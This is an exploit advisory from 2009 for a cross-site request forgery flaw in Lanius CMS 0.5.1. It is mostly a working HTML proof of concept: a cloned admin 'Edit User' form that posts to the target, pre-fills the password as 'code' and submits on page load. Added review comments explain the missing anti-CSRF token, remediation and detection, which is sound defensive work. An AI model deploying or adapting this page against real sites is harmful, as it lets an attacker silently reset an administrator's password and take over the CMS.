
laniuscms-xsrf.txt

Posted on 10 February 2009

[-]Lanius CMS 0.5.1 CSRF vulnerability
[-]exploit found by d14l and marcoj
[-]greetz to soul,stefo,sp1r1t,invisible,kisobran and others
[-] lanius CMS suffers from csrf vulnerabilities which allows attacker change admins password it is only important to change in source [site],[path] and [id] of victim and it will change victims password to "code"
//////////////////////////////////////////////////CODE///////////////////////////////////////////////////////////////////////////
<!--
  Review note (defender's reading of this listing).
  The markup below is a saved copy of the Lanius CMS admin "Edit User" page. Three details
  turn it into a cross-site request forgery demonstration:
    1. the user form's action is an absolute URL on the target (admin.php?com_option=user);
    2. the second body tag calls ui_lcms_st('save') from onload, so the save path runs
       without a click;
    3. both password inputs are pre-filled with the value "code".
  The form carries no per-session or per-request token (its hidden inputs are task, user_id
  and MAX_FILE_SIZE), and the advisory reports that the password change is accepted. That is
  the underlying defect: the server has nothing to tell a forged POST from one made in the
  admin UI by the logged-in administrator.
  Usual remediation (general practice, not stated by the advisory): require an unpredictable
  anti-CSRF token on every state-changing admin request, validate Origin/Referer, ask for
  the current password before a password change, and mark session cookies SameSite.
  Detection idea (unverified against this product): POST requests to
  admin.php?com_option=user whose Origin/Referer is not the CMS's own site.
-->
<!-- NOTE(review): this is the only script loaded by absolute URL from the target. lcms_st(),
     which ui_lcms_st() calls further down, is not defined anywhere in this listing; it
     presumably comes from one of the external scripts (not shown, unconfirmed). -->
<script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script>
<!-- Names the form that ui_lcms_st() looks up by id. -->
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var lcms_data_form='adminform';
/* ]]> */
</script>
<!-- The relative-path scripts and stylesheets from here to the closing head tag appear to be
     carried over from the saved admin page (password meter, avatar preview, menu, theme). -->
<script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script>
<script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script>
<link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" />
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function _init_pwd_box() { initQualityMeter("user_password", "the_password", "Password quality: "); }
pb_addEvent(window, "load", _init_pwd_box);
/* ]]> */
</script>
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
var dil_folder = 'media/forum/avatars/';
var dil_default_src = 'media/forum/avatars/default.png';
function changeImage(srcObj,srcListName) {
  var im=document.getElementById("image_"+srcListName);
  var obj_v = srcObj.value;
  if (obj_v==null || obj_v=="") im.src = dil_default_src;
  else im.src = dil_folder+obj_v;
}
/* ]]> */
</script>
<script type="text/javascript" language="javascript" src="components/forum/forum.js"></script>
<!--
  ui_lcms_st(pressbutton): toolbar handler of the admin page.
    'save'   : checks that user_name, user_user and user_email are non-empty (alert and
               return false otherwise), then falls through to lcms_st(pressbutton).
    'cancel' : navigates to the form's action URL and returns.
  Any other value goes straight to lcms_st(pressbutton). What lcms_st does with the form is
  not visible here; presumably it sets the task field and submits (confirm in anthill.js).
  field_value is assigned without var, so it is an implicit global.
-->
<script type="text/javascript" language="javascript">
/* <![CDATA[ */
function ui_lcms_st(pressbutton){
  var frm=document.getElementById(lcms_data_form);
  if ( pressbutton == 'save' ) {
    var frm=document.getElementById('adminform');
    field_value=frm.user_name.value;
    if (!field_value.length) { alert("Invalid value for Display name");return false; }
    field_value=frm.user_user.value;
    if (!field_value.length) { alert("Invalid value for Username");return false; }
    field_value=frm.user_email.value;
    if (!field_value.length) { alert("Invalid value for Email");return false; }
  }
  if ( pressbutton == 'cancel' ) { document.location.href=frm.action; return;}
  lcms_st(pressbutton);
}
/* ]]> */
</script>
<script language="javascript" type="text/javascript"> var cmThemeDefaultBase = "admin/templates/default/images/"; </script>
<script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script>
<script language="javascript" src="index2.php?option=service&amp;service=admin_menu&amp;no_html=1&amp;lang=en" type="text/javascript"></script>
<script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script>
<link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script>
<link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" />
</head>
<!-- NOTE(review): the listing has two opening body tags and no opening html or head tag,
     although head is closed just above. The onload handler on the second body tag is the
     security-relevant part: it invokes the save handler as soon as the page loads, with no
     user interaction. -->
<body>
<body onload="ui_lcms_st('save');">
<!-- Header, menu and breadcrumb tables: admin UI chrome from the saved page. -->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="320" class="top-logo" > <img src="admin/templates/default/images/header.png" alt="Administration" /> </td>
    <td width="240" class="top-update" > <a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&amp;option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard" /></a> </td>
    <td align="right" class="top-logo" ><a href="index.php?option=login&amp;task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" />&nbsp;Logout</a>&nbsp;</td>
  </tr>
</table>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr class="toolmenu">
    <td height="25"><div id="myMenuID" style="margin-left: 15px;"></div>
      <script language="javascript" type="text/javascript"> cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault"); </script>
      <noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td>
    <td align="right">
      <table class="hotlinks" border="0" cellspacing="0" cellpadding="2">
        <tr><td>&nbsp;</td> </tr>
      </table>
    </td>
    <td align="right"></td>
  </tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0">
  <tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&amp;task=edit&amp;cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td> </tr>
</table>
<div class="dka_component">
<!-- The state-changing request. The form posts multipart data to the user component of
     admin.php. Every field below is a plain, predictable value; none of them is a secret
     tied to the administrator's session, which is what an anti-CSRF token would add. -->
<form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user' enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />
  <input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />
  <noscript>
    <p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
    <select name="alt_task[]">
      <option value="">--</option>
      <option value="save">Save</option>
      <option value="cancel">Cancel</option>
    </select>
    <input type="submit" value="Go" /></noscript>
</div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'>
  <tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr>
  <tr><td colspan='2' class="header1" >Edit User</td></tr>
  <tr><td colspan="2">
    <table width="100%" border="0" cellpadding="5" cellspacing="2" >
      <tr><td class="tabtitle">Edit User&nbsp;</td></tr><tr>
        <td class="tabbody">
          <table width="90%" border="0" align="center" cellpadding="2" cellspacing="0">
            <tr><td width="200">&nbsp;</td><td>&nbsp;</td></tr>
            <tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf" size="40" /></td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf" size="40" /></td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="webmaster@example.com" class="tf" size="40" /></td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf">
              <option value="" selected="selected" style="color: grey">-- Auto --</option>
              <option value="en">English</option>
            </select> </td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf">
              <option value="">-- Auto --</option>
              <option value="Africa/Abidjan">Africa/Abidjan</option>
            </select> </td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf">
              <option value="1">Registered</option>
              <option value="2">Editor</option>
              <option value="3">Publisher</option>
              <option value="4">Manager</option>
              <option value="5" selected="selected" style="color: grey">Administrator</option>
            </select> </td></tr>
            <tr><td colspan='2' class="" >&nbsp;</td></tr>
            <!-- The page's own hint below says an empty password field keeps the old password.
                 In this listing both password inputs are pre-filled with "code", the value the
                 advisory names as the resulting password. The form has no field for the
                 current password. -->
            <tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40' onkeypress="updateQualityMeter(this)" /></td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr>
            <tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40' /></td></tr>
            <tr><td colspan='2' class="" >&nbsp;</td></tr>
            <!-- Remaining rows: messaging options, avatar, forum profile and signature fields
                 of the saved page. NOTE(review): the second label's for attribute
                 (user_message_show_email) does not match its input id (user_message_html). -->
            <tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow">
              <input id="user_message_allow" name="user_message_allow" type="checkbox" />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email">
              <input id="user_message_html" name="user_message_html" type="checkbox" />Can receive HTML emails</label><br /><label for="user_message_attach">
              <input id="user_message_attach" name="user_message_attach" type="checkbox" checked="checked"/>Receive also attachments</label><br />
              <div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr>
                <td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' >
                  <option value="default.png" selected='selected' >&lt; Current &gt;</option>
                  <option value="abstract8.png" >abstract8.png</option>
                </select></td>
                <td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td>
              </tr></table>
                <script type="text/javascript" language="javascript">
                /* <![CDATA[ */
                var tmpi_0 = new Image();
                tmpi_0.src="media/forum/avatars/default.png";
                /* ]]> */
                </script>
              </div>
              <div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" />
                <input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45" /></div>
              <div class="dk_content">
                <h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div>
              <p><h3>Forum user information</h3></p>
              <div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div>
              <div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div>
              <table border="0">
                <tr>
                  <td valign="top">&nbsp;</td>
                  <td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a>
                    <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a>
                    <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>
                  </td>
                </tr>
                <tr>
                  <td valign="top">User provided information (max 1024 characters)</td>
                  <td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td>
                </tr>
                <tr>
                  <td valign="top">&nbsp;</td>
                  <td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a>
                    <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a>
                    <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a>
                    <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>
                  </td>
                </tr>
                <tr>
                  <td valign="top">Custom signature (max 300 characters)</td>
                  <td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td>
                </tr>
              </table></td></tr>
          </table></td></tr></table>
  </td></tr>
</table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />
  <input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />
  <noscript>
    <p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>
    <select name="alt_task[]">
      <option value="">--</option>
      <option value="save">Save</option>
      <option value="cancel">Cancel</option>
    </select>
    <input type="submit" value="Go" /></noscript>
</div></form></div>
<!-- Donation footer of the saved admin page: a separate form that posts to PayPal; it is
     not part of the reported issue. -->
<div class="footer">
  <div title="Donate now EUR 10 for the Lanius CMS Project" align="center">
    <form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
      <input name="cmd" value="_xclick" type="hidden" />
      <input name="business" value="donations@laniuscms.org" type="hidden" />
      <input name="no_shipping" value="0" type="hidden" />
      <input name="lc" value="EN" type="hidden" />
      <input name="item_name" value="Lanius CMS Project donation from website" type="hidden" />
      <input name="currency_code" value="EUR" type="hidden" />
      <input name="amount" value="10.00" type="hidden" />
      Support the Lanius CMS Project with a small donation:
      <input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" />
    </form>
  </div>
</div>
</body>
</html>
////////////////////////////////////////////end of code////////////////////////////////////////////////

 
